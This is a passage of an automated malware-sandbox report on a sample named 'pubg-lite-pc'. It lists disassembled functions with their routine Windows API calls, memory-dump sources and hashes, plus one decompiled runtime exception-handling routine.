                                                                                                • Instruction Fuzzy Hash: E9419C309016499BDB24EFA9CE55BEE77B8FF54320F148229E8159B2D1EB71AE04CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B6F00 Relevance: 3.1, APIs: 2, Instructions: 105windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,F4D3B90A,?,00000000), ref: 009B6F4B
                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 009B6F55
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                • String ID:
                                                                                                • API String ID: 3479602957-0
                                                                                                • Opcode ID: 298ba5cb0969663f9edb65966481a9516fae03b8f97ae74a01eba53c9f39761f
                                                                                                • Instruction ID: f755c69f80a0c4eec78d1d911c29cb853511c743d406d2fcce964253f35c1a22
                                                                                                • Opcode Fuzzy Hash: 298ba5cb0969663f9edb65966481a9516fae03b8f97ae74a01eba53c9f39761f
                                                                                                • Instruction Fuzzy Hash: 8E31C371A04219EBDB10DF98DD05BAEBBF8FB44724F20066EF514E7381DBB599048790
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00956CA0 Relevance: 3.1, APIs: 2, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(00000000,000000FC), ref: 00956D0F
                                                                                                • SetWindowLongW.USER32(00000000,000000FC,?), ref: 00956D1D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: LongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1378638983-0
                                                                                                • Opcode ID: b88af87988312d41cca648f5352949df50e14f7bdc13cfc9128976b8e5d82a34
                                                                                                • Instruction ID: 2dbcc0bb97ed351f88bd64b25602115f9718edc103a8e155dea3f424b350c34e
                                                                                                • Opcode Fuzzy Hash: b88af87988312d41cca648f5352949df50e14f7bdc13cfc9128976b8e5d82a34
                                                                                                • Instruction Fuzzy Hash: A0319C71A00645EFCB10DF69CA44B9AFBB4FF05321F544369E824A76D0DB31EA58CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009DD4E0 Relevance: 3.1, APIs: 2, Instructions: 71fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,F4D3B90A,?,00000000,00000000,00000000,00A88ECD,000000FF), ref: 009DD548
                                                                                                • FindClose.KERNEL32(00000000,?,F4D3B90A,?,00000000,00000000,00000000,00A88ECD,000000FF), ref: 009DD592
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFileFirst
                                                                                                • String ID:
                                                                                                • API String ID: 2295610775-0
                                                                                                • Opcode ID: 33c9648025e6ceb7f1546f2eeca566390420f308a0fdc66e72f1ec51983f23fe
                                                                                                • Instruction ID: 4f8ab5bd7e83a3ae4704c5feccff0dd31cd5e3ea6d06dea4da0727cdd299ba0c
                                                                                                • Opcode Fuzzy Hash: 33c9648025e6ceb7f1546f2eeca566390420f308a0fdc66e72f1ec51983f23fe
                                                                                                • Instruction Fuzzy Hash: D121A171901948DFD710DF68DD49BAEB7B8EF84724F14422AE825972D1DB345A08CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009946E0 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000FC), ref: 00994740
                                                                                                • SetWindowLongW.USER32(?,000000FC,?), ref: 0099474E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: LongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1378638983-0
                                                                                                • Opcode ID: f7cea8065ce11f39b8188a15cd9731c9c542576c8fada835910eb86641f830e9
                                                                                                • Instruction ID: cc3d36d27fd6bd64894fdc600391e7d53ad41cc45005e4d49564e69b2bd0dcaf
                                                                                                • Opcode Fuzzy Hash: f7cea8065ce11f39b8188a15cd9731c9c542576c8fada835910eb86641f830e9
                                                                                                • Instruction Fuzzy Hash: B821BD71904745EFCB11DFA8DE05B8ABFF8FF48720F104619E455A3691DB71AA08CB81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A58A9B Relevance: 1.8, APIs: 1, Instructions: 274COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A58A96,?,?,00000008,?,?,00A63BB8,00000000), ref: 00A58CC8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3997070919-0
                                                                                                • Opcode ID: 2e78e9e19db04d220a61079dc501c10c5d210409acbd396b84b4987137925a2c
                                                                                                • Instruction ID: 6b4a9d0847e7d08e5b7688649b9023b1ffd902cfd4e30d3dd5990259e83b1e5a
                                                                                                • Opcode Fuzzy Hash: 2e78e9e19db04d220a61079dc501c10c5d210409acbd396b84b4987137925a2c
                                                                                                • Instruction Fuzzy Hash: 4FB15E72210608DFD714CF28C486B657BF0FF45366F298658E899DF2A1CB39E986CB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D99A90D Relevance: 1.8, APIs: 1, Instructions: 274COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E6D99A90D(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E6D99AF43(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E6D99AEAF(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}
























                                                                                                0x6d99a91b
                                                                                                0x6d99a922
                                                                                                0x6d99a927
                                                                                                0x6d99a92d
                                                                                                0x6d99a930
                                                                                                0x6d99a936
                                                                                                0x6d99a93b
                                                                                                0x6d99a940
                                                                                                0x6d99a940
                                                                                                0x6d99a946
                                                                                                0x6d99a94b
                                                                                                0x6d99a950
                                                                                                0x6d99a950
                                                                                                0x6d99a957
                                                                                                0x6d99a95c
                                                                                                0x6d99a961
                                                                                                0x6d99a961
                                                                                                0x6d99a968
                                                                                                0x6d99a96d
                                                                                                0x6d99a972
                                                                                                0x6d99a972
                                                                                                0x6d99a979
                                                                                                0x6d99a97e
                                                                                                0x6d99a983
                                                                                                0x6d99a983
                                                                                                0x6d99a98b
                                                                                                0x6d99a99b
                                                                                                0x6d99a9ad
                                                                                                0x6d99a9bf
                                                                                                0x6d99a9d2
                                                                                                0x6d99a9e4
                                                                                                0x6d99a9ec
                                                                                                0x6d99a9f1
                                                                                                0x6d99a9f6
                                                                                                0x6d99a9f6
                                                                                                0x6d99a9fd
                                                                                                0x6d99aa02
                                                                                                0x6d99aa02
                                                                                                0x6d99aa09
                                                                                                0x6d99aa0e
                                                                                                0x6d99aa0e
                                                                                                0x6d99aa15
                                                                                                0x6d99aa1a
                                                                                                0x6d99aa1a
                                                                                                0x6d99aa21
                                                                                                0x6d99aa26
                                                                                                0x6d99aa26
                                                                                                0x6d99aa30
                                                                                                0x6d99aa32
                                                                                                0x6d99aa6c
                                                                                                0x6d99aa34
                                                                                                0x6d99aa39
                                                                                                0x6d99aa5d
                                                                                                0x6d99aa65
                                                                                                0x6d99aa59
                                                                                                0x6d99aa59
                                                                                                0x6d99aa6f
                                                                                                0x6d99aa76
                                                                                                0x6d99aa78
                                                                                                0x6d99aa9a
                                                                                                0x6d99aaa2
                                                                                                0x6d99aaa5
                                                                                                0x6d99aaa5
                                                                                                0x6d99aaa7
                                                                                                0x6d99aaa7
                                                                                                0x6d99aab2
                                                                                                0x6d99aab8
                                                                                                0x6d99aabd
                                                                                                0x6d99aac4
                                                                                                0x6d99aafe
                                                                                                0x6d99ab09
                                                                                                0x6d99ab0f
                                                                                                0x6d99ab12
                                                                                                0x6d99ab15
                                                                                                0x6d99ab21
                                                                                                0x6d99ab29
                                                                                                0x6d99aac6
                                                                                                0x6d99aac9
                                                                                                0x6d99aad5
                                                                                                0x6d99aadb
                                                                                                0x6d99aae1
                                                                                                0x6d99aae4
                                                                                                0x6d99aaed
                                                                                                0x6d99aaed
                                                                                                0x6d99ab2c
                                                                                                0x6d99ab3a
                                                                                                0x6d99ab40
                                                                                                0x6d99ab43
                                                                                                0x6d99ab48
                                                                                                0x6d99ab4a
                                                                                                0x6d99ab4d
                                                                                                0x6d99ab4d
                                                                                                0x6d99ab52
                                                                                                0x6d99ab54
                                                                                                0x6d99ab57
                                                                                                0x6d99ab57
                                                                                                0x6d99ab5c
                                                                                                0x6d99ab5e
                                                                                                0x6d99ab61
                                                                                                0x6d99ab61
                                                                                                0x6d99ab66
                                                                                                0x6d99ab68
                                                                                                0x6d99ab6b
                                                                                                0x6d99ab6b
                                                                                                0x6d99ab70
                                                                                                0x6d99ab72
                                                                                                0x6d99ab72
                                                                                                0x6d99ab7f
                                                                                                0x6d99ab82
                                                                                                0x6d99abb9
                                                                                                0x6d99ab84
                                                                                                0x6d99ab84
                                                                                                0x6d99ab87
                                                                                                0x6d99abb2
                                                                                                0x6d99aba7
                                                                                                0x6d99aba7
                                                                                                0x6d99abbb
                                                                                                0x6d99abc3
                                                                                                0x6d99abc6
                                                                                                0x6d99abe5
                                                                                                0x6d99abea
                                                                                                0x6d99abea
                                                                                                0x6d99abec
                                                                                                0x6d99abf1
                                                                                                0x6d99abfd
                                                                                                0x6d99abf3
                                                                                                0x6d99abf6
                                                                                                0x6d99abf6
                                                                                                0x6d99ac02
                                                                                                0x6d99ac02
                                                                                                0x6d99abc8
                                                                                                0x6d99abcb
                                                                                                0x6d99abda
                                                                                                0x00000000
                                                                                                0x6d99abda
                                                                                                0x6d99abcd
                                                                                                0x6d99abd0
                                                                                                0x6d99abd2
                                                                                                0x6d99abd2
                                                                                                0x00000000
                                                                                                0x6d99abd0
                                                                                                0x6d99ab89
                                                                                                0x6d99ab8c
                                                                                                0x6d99aba2
                                                                                                0x00000000
                                                                                                0x6d99aba2
                                                                                                0x6d99ab91
                                                                                                0x6d99ab93
                                                                                                0x6d99ab93
                                                                                                0x6d99ab91
                                                                                                0x00000000
                                                                                                0x6d99ab82
                                                                                                0x6d99aa7f
                                                                                                0x6d99aa8d
                                                                                                0x6d99aa95
                                                                                                0x00000000
                                                                                                0x6d99aa95
                                                                                                0x6d99aa83
                                                                                                0x6d99aa88
                                                                                                0x6d99aa88
                                                                                                0x00000000
                                                                                                0x6d99aa83
                                                                                                0x6d99aa40
                                                                                                0x6d99aa4e
                                                                                                0x6d99aa56
                                                                                                0x00000000
                                                                                                0x6d99aa56
                                                                                                0x6d99aa44
                                                                                                0x6d99aa49
                                                                                                0x6d99aa49
                                                                                                0x6d99aa44

                                                                                                APIs
                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6D99A908,?,?,00000008,?,?,6D9A548C,00000000), ref: 6D99AB3A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3997070919-0
                                                                                                • Opcode ID: ddc0a7957f2999f4de190e11b8bd0a1edaad23f02fecfeb6c675d058a3f383d0
                                                                                                • Instruction ID: e8d3cd1ec1de0e15b534a9c034ceda419447546a16c888e524012c082307a368
                                                                                                • Opcode Fuzzy Hash: ddc0a7957f2999f4de190e11b8bd0a1edaad23f02fecfeb6c675d058a3f383d0
                                                                                                • Instruction Fuzzy Hash: E7B14C71A20605DFD706CF28C486F657BE1FF45365F298658E8A9CF2A1C335E981CB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0093EE10 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NtdllDefWindowProc_W.NTDLL(?,-00002000,?,?,0093DA06,?,?,?,?,?,?,?,?,0093D868,?,?), ref: 0093EE60
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: NtdllProc_Window
                                                                                                • String ID:
                                                                                                • API String ID: 4255912815-0
                                                                                                • Opcode ID: b1372fd6a5d2ed2d2595fb8c9d67cc209b6764fcb5fbedf5e256f1adafb27f2d
                                                                                                • Instruction ID: 48c687c72d8f9bf5a98151255dd9b4312886b012af36965d7e87b64247b78f3f
                                                                                                • Opcode Fuzzy Hash: b1372fd6a5d2ed2d2595fb8c9d67cc209b6764fcb5fbedf5e256f1adafb27f2d
                                                                                                • Instruction Fuzzy Hash: 10F08C70008245DEE7218B14D85CB69BBAAFB59342F4849E5E088C64E0D375CE44DF14
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0095A890 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID: 0-3916222277
                                                                                                • Opcode ID: 1a3dc85d32c1abe8d8d8bb4036b4d28936867328a4165c75ebd82f801a2152f8
                                                                                                • Instruction ID: fd5677aa835fa4b216c83a43545f9b1fcde07bf333ccea59c66f3c4218268415
                                                                                                • Opcode Fuzzy Hash: 1a3dc85d32c1abe8d8d8bb4036b4d28936867328a4165c75ebd82f801a2152f8
                                                                                                • Instruction Fuzzy Hash: 46C1F2B0801748DFE721CF64C55878ABFF0BF19308F14899DD4AA5B291D7BAA608DF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00974B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Kernel32.dll
                                                                                                • API String ID: 0-1926710522
                                                                                                • Opcode ID: f5587099c2084567659b50420d42ffae517f4e3e96c22574efb20c80dc8319c8
                                                                                                • Instruction ID: 9ac2c6e5a9674efb42189b8764e221231bbd02d7aa93ff184a68287ac50deb52
                                                                                                • Opcode Fuzzy Hash: f5587099c2084567659b50420d42ffae517f4e3e96c22574efb20c80dc8319c8
                                                                                                • Instruction Fuzzy Hash: 5151CEB0905B46EEE704CF65C51878AFFF0BB05308F20825DC4589B691D7BAA669CFD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0098EE50 Relevance: .5, Instructions: 515COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
